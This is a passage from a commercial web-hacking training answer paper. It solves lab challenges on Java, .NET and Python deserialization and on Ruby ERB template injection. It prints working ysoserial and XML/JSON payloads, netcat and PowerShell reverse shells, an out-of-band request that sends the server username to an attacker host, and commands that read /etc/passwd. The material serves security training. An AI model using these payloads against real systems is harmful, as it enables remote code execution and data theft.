Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: To generate compressed Java deserialization payload, it is required to modify the original
ysoserial source code. To do that, navigate to the following link or command to download the Git
repository.

Source: https://github.com/frohoff/ysoserial

Git command: git clone https://github.com/frohoff/ysoserial.git

Step 7: While navigating to the build instruction of ysoserial, it was observed that the project was
built in Maven framework, and it is required to download distributed binaries of Maven framework to
compile the source code of ysoserial as shown in figure:

Page: | 57

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Download the latest Maven binaries from the download link given and extract it using
following command:

Download link: https://maven.apache.org/download.cgi

Latest version at the time of writing:

https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-
maven-3.6.3-bin.tar.gz

Command: tar xzvf apache-maven-3.6.3-bin.tar.gz

Step 9: In order to generate the compressed ysoserial deserialization payload, it is required to


modify the generate 'src/main/java/ysoserial/GeneratePayload.java' file as shown in figure:

Code Change 1:
import java.util.zip.DeflaterOutputStream;
import java.io.*;

Code Change 2:
System.out.println(compressObject(object));
Comment out next 3 statement using '/*$SOURCE_CODE$*/'

Code Change 3:
public static String compressObject(Object obj) throws IOException {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
OutputStream mCompressdos = new DeflaterOutputStream(byteArrayOutputStream);
ObjectOutputStream mOutputStream = new ObjectOutputStream(mCompressdos);
mOutputStream.writeObject(obj);
mOutputStream.close();
mCompressdos.close();

Page: | 58

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

return new
String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray()));
}

Page: | 59

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Once the source code is modified, compile it using the following Maven command as
shown in figure:

Command: mvn clean package -DskipTests

Step 11: Start TCP listener.

root@Kali:~# tcpdump -n udp port 53 -i any

Step 12: Once compilation is successful, there will be a new 'target' folder created, Navigate to
'target' folder and using the following command, generate the ysoserial payload as also shown in
figure:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'nslookup


deserialize.userX.webhacklab.com'

Page: | 60

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Add the generated payload in 'rememberMe' cookie in request and forward the request
and observe that the application responds with an error of 'serialVersionUID mismatch' as shown in
figure:

Page: | 61

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 14: The following bash script is used to fetch the 'serialVersionUID' of all the available versions
of 'commons-beanutils'.

#!/bin/bash

#Example usage: ./getSUIDs.sh


https://archive.apache.org/dist/commons/beanutils/binaries/
org.apache.commons.beanutils.BeanComparator
#Example2 usage: ./getSUIDs.sh
https://archive.apache.org/dist/commons/collections/binaries/
org.apache.commons.collections4.functors.InvokerTransformer

url=$1
class=$2

mkdir tmpjars
for zip in $(curl -s $url | grep '.zip<' | grep -Eo 'href="[^\"]+"' | cut -d
'"' -f 2);do
wget -O tmpjars/current.zip -4 $url$zip --no-check-certificate &>/dev/null
unzip tmpjars/current.zip -d tmpjars &>/dev/null

echo "Checking file: $zip"


for jar in $(find tmpjars/ -name '*.jar');do
serialver -classpath $jar $class 2>/dev/null| grep serialVersionUID
done

rm -rf tmpjars/*
done
rm -d tmpjars/

Page: | 62

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 15: After executing the above script, observe that the application might be using the commons-
beanutils v1.7.0 to 1.8.3 and ysoserial latest version built in 'commons-beanutils v1.9.2' as shown in
figure:

root@Kali: ~/tools# chmod a+x getSUIDs.sh

root@Kali: ~/tools# ./getSUIDs.sh


https://archive.apache.org/dist/commons/beanutils/binaries/
org.apache.commons.beanutils.BeanComparator

Page: | 63

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 16: Navigate to ysoserial source code and modify the ‘pom.xml’ and replace the version of
'commons-beanutils' from '1.9.2' to '1.7.0' and compile the ysoserial source code as shown in figure:

Page: | 64

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 17: Again generate the deserialization payload using same command as shown in figure:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'nslookup


deserialize.userX.webhacklab.com'

Step 18: Add the generated payload in 'rememberMe' cookie as shown in figure:

Page: | 65

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 19: The payload gets successfully executed and a request on python server will be received as
shown in figure:

Step 20: Generate the payload using tool ‘ysoserial-master.jar’ to perform the action of taking a
reverse shell using the below command:

root@Kali:~/ysoserial/target# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar


CommonsBeanutils1 'nc -e /bin/sh 192.168.4.X 9898'

Step 21: Start a “nc listener” to wait for reverse shell

root@Kali:~# nc -nlvp 9898

Page: | 66

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 22: Copy the payload we generated in the above step and paste this entire payload in the
rememberme cookie and observe the command execution on the server.

Page: | 67

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 23: As can be seen from the screenshot below, we received a reverse shell on our internal kali
host confirming command execution.

Page: | 68

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Java Deserialization Attack - XML


Challenge URL: http://mblog.webhacklab.com/api/add/microblog

• Identify the request to inject XML serialised data and inject a payload into it to make
the host send ping requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and also read “/etc/passwd” file.

Solution
Step 1: Login into the Microblog and post a blog.

Step 2: Observe the request. It’s a simple REST API request which adds the content.

Step 3: In the source code we get some hints about the new update.

Page: | 69

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Modify the request to check if the server accepts XML as an input. Web frameworks in Java
use XStream or XMLDecoder libraries to convert HTTP request parameters to objects through a
process called Deserialization which may lead to remote code execution. In the screenshot below
when we tried to change our request to XML , the application servers an XML parsing error which
gives us a hint that the HTTP request is attempting to be parsed as an XML.

<?xml version="1.0" encoding="UTF-8"?>


<java version="1.7" class="java.beans.XMLDecoder">
<object class="awh.notsosecure.mblog.web.forms.MicroblogForm">
<void property="content">
<string>test</string>
</void>
</object>
</java>

Page: | 70

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Start sniffing traffic using TCPDump.

tcpdump -n udp port 53 -i any

Page: | 71

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Let’s send the following XML file to the application , the XStream parser will try to
deserialize the object and execute the java.lang.Runtime class giving us a remote code execution

<?xml version="1.0" encoding="UTF-8"?>


<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0">
<string>nslookup</string>
</void>
<void index="1">
<string>spam1234.userX.webhacklab.com</string>
</void>
</array>
<void method="start" />
</object>

Page: | 72

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: As can be seen from the screenshot below we received a dns request for domain resolution
on our Authoritative domain “userX.webhacklab.com” confirming command execution.

tcpdump -n udp port 53 -i any

Step 8: Start to listen on any port, let’s say 9999.

root@Kali:~# nc -nvlp 9999

Page: | 73

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: If we send the following XML file to the application, the XStream parser will try to deserialize
the object and execute our command “nc -e /bin/sh 192.168.4.X 9999”.

<?xml version="1.0" encoding="UTF-8"?>


<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="5">
<void index="0">
<string>nc</string>
</void>
<void index="1">
<string>-e</string>
</void>
<void index="2">
<string>/bin/sh</string>
</void>
<void index="3">
<string>192.168.4.X</string>
</void>
<void index="4">
<string>9999</string>
</void>
</array>
<void method="start" />
</object>

Page: | 74

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: As can be seen from the screenshot below we can access the system using reverse shell
and execute commands.

Page: | 75

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Jackson JSON Deserialization Attack


Challenge URL: http://mblog.webhacklab.com/mblog/api/add/microblog

• Get a reverse shell and extract the system information such as username, OS type
from the server and also read “/etc/passwd” file.

Solution:
Step 1: Login into the Microblog and post a blog and intercept the request in Burp.

Step 2: Observe the request. It is a simple REST API request which adds the content.

Page: | 76

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Break the JSON format by simply removing the last “ ” ” (Double Quote) near Test as shown
below and observe the error. This looks like a JSON serialized string.

Note: From the error we can observe that the Jackson databind library is being used. This library is
vulnerable to JSON deserialization attacks.

Step 4: The most common framework in java applications is Spring and if we feed the below JSON
data to a Jackson parser parsing it, it’ll try to load a Spring Configuration(ApplicationContext) file
from over the network.

["org.springframework.context.support.FileSystemXmlApplicationContext",
"http://192.168.4.X:80/spel.xml"]

Page: | 77

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Now within this configuration file we can embed “SpEL i.e. Spring Expression Language”
which can execute code. So let’s host the below spel.xml file on our kali machine and send the
JSON request of Step 4 to our application

<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<array>
<value>nc</value>
<value>192.168.4.X</value>
<value>4444</value>
<value>-e</value>
<value>/bin/bash</value>
</array>
</constructor-arg>
<property name="whatever" value="#{ pb.start() }"/>
</bean>
</beans>

root@Kali:~/tools# python3 -m http.server 80

Page: | 78

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Start a netcat listener

root@Kali:~# nc -nvlp 4444

Step 7: Observe the request on the python web server

Step 8: On successful execution we get the reverse shell as shown below

Page: | 79

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

.NET Serialization Attack


Challenge URL: http://admin.webhacklab.com

• Identify and exploit the .Net Deserialization vulnerability to make the host send DNS
requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and read “win.ini” file.

Solution:
Step 1: Navigate to the http://admin.webhacklab.com URL and intercept the response in Burp.

Page: | 80

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: There is a cookie named “__NSSTemp” which is Base64 Encoded that reads
“AAEAAAD/////AQAAA” which assures us that there is some serialized data being communicated.

Step 3: Now on a windows system we can generate the serialized payload using the ysoserial.net
tool to send an out of band request containing the web server username to an attacker-controlled
domain.

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c


"powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8888/$env:UserName"

Page: | 81

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Alternative: you can use the web utility located at http://utility.webhacklab.com/YSoSerial.aspx to


generate the payloads

powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8888/$env:UserName

Step 4: Start the python server to get an Out Of Band Call.

root@Kali:~/tools# python3 -m http.server 8888

Page: | 82

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Replace the serialized string in “__NSSTemp” cookie with the value generated in Step 3
and send a request.

Step 6: We get the OOB request along with the web server’s machine name.

Step 7: To get the reverse shell start listener on the server.

root@Kali:~/tools# nc -nlvp 4444

Page: | 83

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Generate the payload using terminal or web interface for reverse shell.

powershell.exe \"$client = New-Object


System.Net.Sockets.TCPClient('192.168.4.X',4444);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1
| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendb
yte.Length);$stream.Flush()};$client.Close()\"

Page: | 84

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Replace the serialized string in “__NSSTemp” cookie with the value generated in Step 8
and send request.

Step 10: We get a reverse shell and can run the commands.

Page: | 85

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: The result of “ipconfig” command.

Step 12: The result of “whoami”

Step 13: The result of “win.ini”

Page: | 86

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Python Serialization Attack


Challenge URL: http://reimbursement.webhacklab.com/Support/AddTicket

• Identify and exploit the Python Deserialization vulnerability to make the host send
DNS requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and read “/etc/passwd” file

Solution:
Step 1: Go to the Support section of the application and select Add Ticket.

Step 2: Fill up the support request and upload a sample text file ‘test.txt’ and intercept the request in
Burp.

Note: Make sure that the txt file has some content. Application will not allow empty file upload.

Page: | 87

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: There are two parameters that send data in a Base64 encoded value as highlighted below:

Step 4: Enter any invalid character as value in the ‘title’ parameter to check the error in response.

Page: | 88

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Use the python script to generate a python deserialization payload using the script available
in the Kali machine to receive an out-of-band call as shown below:

Command:

root@Kali:/tools/python_deserialization~# python3 python_deser_oob.py


testing.userX.webhacklab.com

Step 6: Start a Tcpdump listener for an OOB call:

tcpdump -n udp port 53 -i any

Step 7: Replace the value in ‘title’ parameter with generated payload as shown below.

Page: | 89

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: An OOB call will be received.

Step 9: Generate the payload for the reverse shell using the following command.

root@Kali:~/tools/python_deserialization# python3 python_deser_shell.py


192.168.4.X 4444

Page: | 90

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Start a Netcat listener on port mentioned in the script:

root@Kali:~# nc -nlvp 4444

Step 11: Enter the generated payload in the ‘title’ parameter and send the Request.

Step 12: A reverse shell is obtained, and we can run commands.

Page: | 91

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Execute ‘cat /etc/passwd’ to complete the challenge.

cat /etc/passwd

Page: | 92

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Bonus: Plex Python Deserialization


Challenge URL: http://plex.webhacklab.com:32400

• Perform RCE using python deserialization vulnerability.

Solution:
Step 1: Navigate to the application as shown in figure:

Step 2: Login using admin user account and login to the application as shown in figure:

Page: | 93

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Navigate to browser inspector tab as shown in figure:

Step 4: Navigate to Storage -> Local Storage and select the "http://plex.webhacklab.com:32400"
and copy the "myPlexAccessToken" value as shown in figure:

Page: | 94

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Use the following Metasploit module and set the information to obtained reverse shell.

root@Kali:~# msfconsole

msf > use exploit/windows/http/plex_unpickle_dict_rce

msf exploit(handler) > set PLEX_TOKEN myPlexToken

msf exploit(handler) > set RHOSTS 192.168.200.130

msf exploit(handler) > set LHOST 192.168.4.X

msf exploit(handler) > set LPORT <PORT>

msf exploit(handler) > run

Page: | 95

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: The meterpreter session is opened.

Step 7: Obtained the system information and ipconfig information.

Page: | 96

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Ruby/ERB Template Injection


Challenge URL: http://shop.webhacklab.com/referral.php

• Identify the template engine and exploit it to extract the content of the file
“/etc/passwd”

Solution:
Step 1: Notice the “Refer a friend” link in the Shop application, which points to
“http://shop.webhacklab.com/referral.php”

Step 2: Now try to, fill in the details to check for Injection, there is an input validation on Name and
email, however, Message accepts everything, enter the following in the Message:

<%= 7*7 %>

Page: | 97

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: On clicking the “Refer a Friend” button, the application will render the ERB template and
send an email, as shown below:

Step 4: Inject another code with the content:

<%= File.open('/etc/passwd').read %>

Page: | 98

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: On clicking the “Refer a Friend” button, the application will email the contents of the file
“etc/passwd”, as shown below:

Step 6: OOB calls can also be made on this vulnerable parameter, make sure a dns listener is
started on the kali box and inject the code as below in the Message text (with backtick ` and not
single quote ‘):

<%= `nslookup superspam.userX.webhacklab.com` %>

Page: | 99

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Start tcpdump on your kali VM to dump dns requests, using the following command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 8: Once the request is sent, the DNS requests are being received by the host.

END OF PART - 2

Page: | 100

©
Claranet Cyber Security 2021. All rights reserved

You might also like